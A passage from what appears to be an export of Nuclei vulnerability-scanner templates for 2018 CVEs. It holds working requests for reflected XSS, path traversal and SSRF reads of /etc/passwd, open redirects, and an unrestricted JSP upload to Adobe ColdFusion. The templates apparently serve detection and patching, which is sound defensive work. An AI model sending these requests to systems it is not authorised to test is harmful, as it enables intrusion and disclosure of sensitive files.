cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: synacor\n product: zimbra_collaboration_suite\n tags: cve,cve2018,xss,zimbra,synacor\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206f46ca25bae61a8c58a2d3c73103864b52d0333002e1c2422e184eef65e1321b022070c5d6a65e7a9734927fdd6fed6fedc1651f044f5268dd3a44c0d7550fb33f82:922c64590222798bb761d5b6d8e72950", "hash": "da3ef89fc46f0ce026207d18abd02c79", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308046" }, "name": "CVE-2018-14064.yaml", "content": "id: CVE-2018-14064\n\ninfo:\n name: VelotiSmart Wifi - Directory Traversal\n author: 0x_Akoko\n severity: critical\n description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in VelotiSmart Wifi.\n reference:\n - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac\n - https://www.exploit-db.com/exploits/45030\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064\n - https://medium.com/%40s1kr10s/velotismart-0day-ca5056bcdcac\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-14064\n cwe-id: CWE-22\n epss-score: 0.15741\n epss-percentile: 0.95409\n cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: velotismart_project\n product: velotismart_wifi_firmware\n tags: 
cve2018,cve,edb,lfi,camera,iot,velotismart_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022063bdd1fe9b5c2d2aa2adee684558be85ff6671a613274c6e7a707fb69329681f022100d3107d95cef68cee1d04cac1bedee37ba1d5188c53813eb37ef9251229e9ea99:922c64590222798bb761d5b6d8e72950", "hash": "a0d8382809b64267c9a17c8920aa8dea", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308047" }, "name": "CVE-2018-14474.yaml", "content": "id: CVE-2018-14474\n\ninfo:\n name: Orange Forum 1.4.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability.\n reference:\n - https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa\n - https://seclists.org/fulldisclosure/2019/Jan/32\n - https://vuldb.com/?id.122045\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14474\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-14474\n cwe-id: CWE-601\n epss-score: 0.00068\n epss-percentile: 0.28116\n cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: goodoldweb\n product: orange_forum\n tags: cve2018,cve,redirect,orangeforum,oss,seclists,goodoldweb\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/login?next=http://interact.sh/?app.scan/'\n - '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a00483046022100f2adff2da944fbe9a1b29f662efd016ead45875d2e06992cd9e61e573f5877f4022100d08b0890924b7addb0673fc531f213922f2e4e23760f5dbca533566a40845382:922c64590222798bb761d5b6d8e72950", "hash": "d70583f5f8ba52e930232d6b3425e963", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308048" }, "name": "CVE-2018-14574.yaml", "content": "id: CVE-2018-14574\n\ninfo:\n name: Django - Open Redirect\n author: pikpikcu\n severity: medium\n description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities.\n remediation: |\n Upgrade to the latest version of Django or apply the relevant patch provided by the Django project.\n reference:\n - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/\n - https://usn.ubuntu.com/3726-1/\n - http://web.archive.org/web/20211206044224/https://securitytracker.com/id/1041403\n - https://www.debian.org/security/2018/dsa-4264\n - https://access.redhat.com/errata/RHSA-2019:0265\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14574\n classification:\n cvss-metrics: 
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-14574\n cwe-id: CWE-601\n epss-score: 0.00828\n epss-percentile: 0.80126\n cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: djangoproject\n product: django\n tags: cve,cve2018,django,redirect,djangoproject\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}//www.interact.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Location: https://www.interact.sh\"\n - \"Location: http://www.interact.sh\"\n\n - type: status\n status:\n - 301\n# digest: 4b0a004830460221009caa5018de3f67f939a8bcb172921b8986a43ff83a2c7628413233ec2433c2af0221009d8028df2af32e3128aa06fe627e6d4c10fe49894f9539685a34e7f1a00e83ca:922c64590222798bb761d5b6d8e72950", "hash": "1e9d60425a6363b9bede2953f8a3c0b7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308049" }, "name": "CVE-2018-14728.yaml", "content": "id: CVE-2018-14728\n\ninfo:\n name: Responsive filemanager 9.13.1 Server-Side Request Forgery\n author: madrobot\n severity: critical\n description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.\n impact: |\n An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: |\n Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.\n reference:\n - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html\n - https://www.exploit-db.com/exploits/45103/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14728\n - https://github.com/sobinge/nuclei-templates\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-14728\n 
cwe-id: CWE-918\n epss-score: 0.96369\n epss-percentile: 0.99525\n cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tecrail\n product: responsive_filemanager\n tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/filemanager/upload.php\"\n\n body: fldr=&url=file:///etc/passwd\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100b505af24e357311546c8a4a494a248180a1e6a98fd1a43f547164d50c8df1a330220773e22a98921c0d651164ccefc4d424b77d72e22da28bcff69a945e1d384777c:922c64590222798bb761d5b6d8e72950", "hash": "67d092a1ffe5d54c8b268854700c0aba", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804a" }, "name": "CVE-2018-14912.yaml", "content": "id: CVE-2018-14912\n\ninfo:\n name: cgit < 1.2.1 - Directory Traversal\n author: 0x_Akoko\n severity: high\n description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.\n remediation: |\n Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2018080034\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14912\n - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html\n - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627\n - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-14912\n cwe-id: CWE-22\n epss-score: 0.96539\n epss-percentile: 0.99521\n cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cgit_project\n product: cgit\n tags: cve,cve2018,cgit,lfi,cgit_project\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d6532de8059fab7fd78681f2120fb2a87cd3cb86792239d399ddefff43a1c3ac022100fcebf55316c2ace6c35b49754ffeb2a9ebe30f47a7b5437981e19da9b5545f82:922c64590222798bb761d5b6d8e72950", "hash": "b0f98b86e93ce33784e3dacaaf2d29a3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804b" }, "name": "CVE-2018-14916.yaml", "content": "id: CVE-2018-14916\n\ninfo:\n name: Loytec LGATE-902 <6.4.2 - Local File Inclusion\n author: 0x_Akoko\n severity: critical\n description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the device.\n remediation: |\n Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14916\n - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html\n - https://seclists.org/fulldisclosure/2019/Apr/12\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\n cvss-score: 9.1\n cve-id: CVE-2018-14916\n cwe-id: CWE-732\n epss-score: 0.00685\n epss-percentile: 0.79617\n cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: loytec\n product: lgate-902_firmware\n tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - 
type: status\n status:\n - 200\n# digest: 4a0a00473045022043b6d593685732c05b518667af8e2a87711364d9dba4b0f64504a93eae54f2d9022100c5bf2364a2dd3724e40859f816ee1840a3245ed1a33f2273abf587916684486e:922c64590222798bb761d5b6d8e72950", "hash": "22777338065eee7bc3a243db5f6d42be", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804c" }, "name": "CVE-2018-14918.yaml", "content": "id: CVE-2018-14918\n\ninfo:\n name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2019/Apr/12\n - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14918\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/HimmelAward/Goby_POC\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-14918\n cwe-id: CWE-22\n epss-score: 0.44897\n epss-percentile: 0.97077\n cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: loytec\n product: lgate-902_firmware\n shodan-query: http.html:\"LGATE-902\"\n tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950", "hash": "0eeac231ea71921d506366d725ae71fe", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804d" }, "name": "CVE-2018-14931.yaml", "content": "id: CVE-2018-14931\n\ninfo:\n name: Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Polarisft to fix the open redirect vulnerability.\n reference:\n - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14931\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-14931\n cwe-id: CWE-601\n epss-score: 0.00118\n epss-percentile: 0.44971\n cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: polarisft\n product: intellect_core_banking\n tags: cve,cve2018,redirect,polarisft,intellect\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'\n\n matchers:\n - type: regex\n part: header\n 
regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 490a0046304402201be780a4469ea0a8738f8438126c71d69f8d31d05d6839b39986254edf0db41402207b1a3a25c0738e82ca020983b3a8445e0463f65171558f9d5011fdcafecd6853:922c64590222798bb761d5b6d8e72950", "hash": "896f17f1603b19c386c10a6d2d6314eb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804e" }, "name": "CVE-2018-15138.yaml", "content": "id: CVE-2018-15138\n\ninfo:\n name: LG-Ericsson iPECS NMS 30M - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2018080070\n - https://www.exploit-db.com/exploits/45167/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15138\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-15138\n cwe-id: CWE-22\n epss-score: 0.21114\n epss-percentile: 0.95976\n cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: ericssonlg\n product: ipecs_nms\n tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data\"\n - \"{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - 
type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202b0ed4bce15d30705879eea7dd0299bd568936f4c93490a2eb2cf6a120bbec9d022058e551bd65de05595c3d6a81d60313c7062d261e34d7c7466911ba50e8cb87f8:922c64590222798bb761d5b6d8e72950", "hash": "b77ed328fe624b6aca9256a514913f11", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804f" }, "name": "CVE-2018-15517.yaml", "content": "id: CVE-2018-15517\n\ninfo:\n name: D-Link Central WifiManager - Server-Side Request Forgery\n author: gy741\n severity: high\n description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. 
This can be automated via script or using a browser.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager.\n reference:\n - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517\n - http://seclists.org/fulldisclosure/2018/Nov/28\n - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N\n cvss-score: 8.6\n cve-id: CVE-2018-15517\n cwe-id: CWE-918\n epss-score: 0.01001\n epss-percentile: 0.83284\n cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: central_wifimanager\n tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/\"\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100b339ad6df9268d6b897b9c6b3faae2d6ea097baf206beafbf09c0a0f1c14b0d40221009cac5ad6cdb667b20025da67357b1151ebce73e32b71995292f1d60d7a43e50e:922c64590222798bb761d5b6d8e72950", "hash": "298ac33806eb1fa57222c911f0ef86b0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308050" }, "name": "CVE-2018-15535.yaml", "content": "id: CVE-2018-15535\n\ninfo:\n name: Responsive FileManager <9.13.4 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Responsive FileManager before version 9.13.4 is vulnerable to local file 
inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45271\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15535\n - http://seclists.org/fulldisclosure/2018/Aug/34\n - https://www.exploit-db.com/exploits/45271/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-15535\n cwe-id: CWE-22\n epss-score: 0.97149\n epss-percentile: 0.9976\n cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tecrail\n product: responsive_filemanager\n tags: cve,cve2018,lfi,edb,seclists,tecrail\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203c4ddbcd4e1d9a14a467c108e82ff87b32ec9351cb237830dd61e9ade6527fd0022040b2a10a4d6e4ce8557f04d663b75210e2f1e9ff391b65f66608c885c794c323:922c64590222798bb761d5b6d8e72950", "hash": "f7220e5fe4b7d6e8a04f98c94e1e211f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308051" }, "name": "CVE-2018-15745.yaml", "content": "id: CVE-2018-15745\n\ninfo:\n name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion\n author: gy741\n severity: high\n description: |\n Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE 
parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Upgrade to a patched version of Argus Surveillance DVR.\n reference:\n - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt\n - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html\n - https://www.exploit-db.com/exploits/45296/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15745\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-15745\n cwe-id: CWE-22\n epss-score: 0.94576\n epss-percentile: 0.99184\n cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: argussurveillance\n product: dvr\n tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"for 16-bit app support\"\n - \"[drivers]\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dc9985c42c6ada43064e760b5d0e9e7c91e0c13be081b6667a4578d416a3f8ac022100b49638b1fa7561d27698d6962f89f45384b44df899a37f6e01d94674e4651cd0:922c64590222798bb761d5b6d8e72950", "hash": "2b1c3b7f7f1afa6d795b057490d1dd95", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308052" }, "name": "CVE-2018-15917.yaml", "content": "id: CVE-2018-15917\n\ninfo:\n name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject 
arbitrary web script or HTML via the language parameter to session/language.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45338\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15917\n - https://github.com/bbalet/jorani/issues/254\n - https://github.com/JavierOlmedo/JavierOlmedo\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2018-15917\n cwe-id: CWE-79\n epss-score: 0.04217\n epss-percentile: 0.92046\n cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: jorani_project\n product: jorani\n shodan-query: title:\"Login - Jorani\"\n tags: cve,cve2018,jorani,xss,jorani_project\n\nhttp:\n - raw:\n - |\n GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /session/login HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '_jorani'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950", "hash": "7397e0dbcb2bb1b0230e9d2d49cd78f5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308053" }, "name": "CVE-2018-15961.yaml", "content": "id: CVE-2018-15961\n\ninfo:\n name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution\n author: SkyLark-Lab,ImNightmaree\n severity: critical\n description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. 
Successful exploitation could lead to arbitrary code execution.\n impact: |\n Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to take control of the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Adobe to fix this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15961\n - https://github.com/xbufu/CVE-2018-15961\n - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html\n - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621\n - http://www.securitytracker.com/id/1041621\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-15961\n cwe-id: CWE-434\n epss-score: 0.97411\n epss-percentile: 0.99921\n cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: adobe\n product: coldfusion\n shodan-query: http.component:\"Adobe ColdFusion\"\n tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive\n\nhttp:\n - raw:\n - |\n POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n -----------------------------24464570528145\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n Content-Type: image/jpeg\n\n <%@ page import=\"java.util.*,java.io.*\"%>\n <%@ page import=\"java.security.MessageDigest\"%>\n <%\n String cve = \"CVE-2018-15961\";\n MessageDigest alg = MessageDigest.getInstance(\"MD5\");\n alg.reset();\n alg.update(cve.getBytes());\n byte[] digest = alg.digest();\n StringBuffer hashedpasswd = new StringBuffer();\n String hx;\n for (int i=0;i\n -----------------------------24464570528145\n Content-Disposition: form-data; name=\"path\"\n\n {{randstr}}.jsp\n -----------------------------24464570528145--\n - |\n GET 
